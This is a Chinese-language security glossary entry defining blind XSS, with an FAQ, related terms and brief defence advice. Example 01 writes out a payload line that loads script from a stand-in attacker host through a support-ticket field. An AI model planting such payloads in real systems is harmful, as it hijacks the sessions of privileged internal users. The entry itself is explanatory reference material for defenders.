盲打 XSS
盲打 XSS 是什么?
盲打 XSS存储型 XSS 的一种,载荷在攻击者无法直接观察到的环境中触发,通常是内部管理后台或工作台。
盲打 XSS 是存储型 XSS 的子类,恶意脚本并不在攻击者自己的浏览器中执行,而是在另一个通常具有更高权限的环境中触发,例如客服工单页、风控审核控制台、内部仪表板或备份报告。攻击者通过公共表单(联系表单、注册、工单)提交载荷,然后等待内部用户查看已保存的数据。检测依赖带外回调:载荷会将数据外发到 XSS Hunter、Burp Collaborator 或自建 DNS/HTTP 服务器,从而暴露脚本运行的位置。防御方式与存储型 XSS 相同,并应在管理工具上启用严格的 CSP。
● 示例
- 01
工单表单字段包含 <script src=https://x.attacker/x.js></script>,在客服 CRM 中触发。
- 02
User-Agent 头被记录在管理日志查看器中,未对 HTML 进行编码而执行。
● 常见问题
盲打 XSS 是什么?
存储型 XSS 的一种,载荷在攻击者无法直接观察到的环境中触发,通常是内部管理后台或工作台。 它属于网络安全的 攻击与威胁 分类。
盲打 XSS 是什么意思?
存储型 XSS 的一种,载荷在攻击者无法直接观察到的环境中触发,通常是内部管理后台或工作台。
盲打 XSS 是如何工作的?
盲打 XSS 是存储型 XSS 的子类,恶意脚本并不在攻击者自己的浏览器中执行,而是在另一个通常具有更高权限的环境中触发,例如客服工单页、风控审核控制台、内部仪表板或备份报告。攻击者通过公共表单(联系表单、注册、工单)提交载荷,然后等待内部用户查看已保存的数据。检测依赖带外回调:载荷会将数据外发到 XSS Hunter、Burp Collaborator 或自建 DNS/HTTP 服务器,从而暴露脚本运行的位置。防御方式与存储型 XSS 相同,并应在管理工具上启用严格的 CSP。
如何防御 盲打 XSS?
针对 盲打 XSS 的防御通常结合技术控制与运营实践,详见上方完整定义。
盲打 XSS 还有哪些其他名称?
常见的别称包括: 带外 XSS。
● 相关术语
- attacks№ 240
跨站脚本(XSS)
一种 Web 漏洞,攻击者可在其他用户浏览的页面中注入恶意脚本,使其在受害者浏览器中以该站点的来源身份运行。
- attacks№ 1107
存储型 XSS
一种持久化的跨站脚本漏洞,攻击者注入的脚本被保存到服务器,并在每位访问者的浏览器中执行。
- attacks№ 912
反射型 XSS
一种非持久化 XSS,攻击者控制的请求参数被立即反射到响应中,并在受害者浏览器中执行。
- attacks№ 347
基于 DOM 的 XSS
一种 XSS 变体,注入和执行完全发生在浏览器中,因为客户端 JavaScript 将未净化的数据写入危险接收点。
- appsec№ 214
内容安全策略 (CSP)
一种 HTTP 响应头,告诉浏览器允许加载哪些来源的脚本、样式、框架等内容,从而限制 XSS 与数据注入攻击的影响。
- appsec№ 773
输出编码
将不可信数据转换为特定输出上下文(HTML、JavaScript、URL、SQL、Shell)安全的形式,使其无法逃逸并被当作代码执行。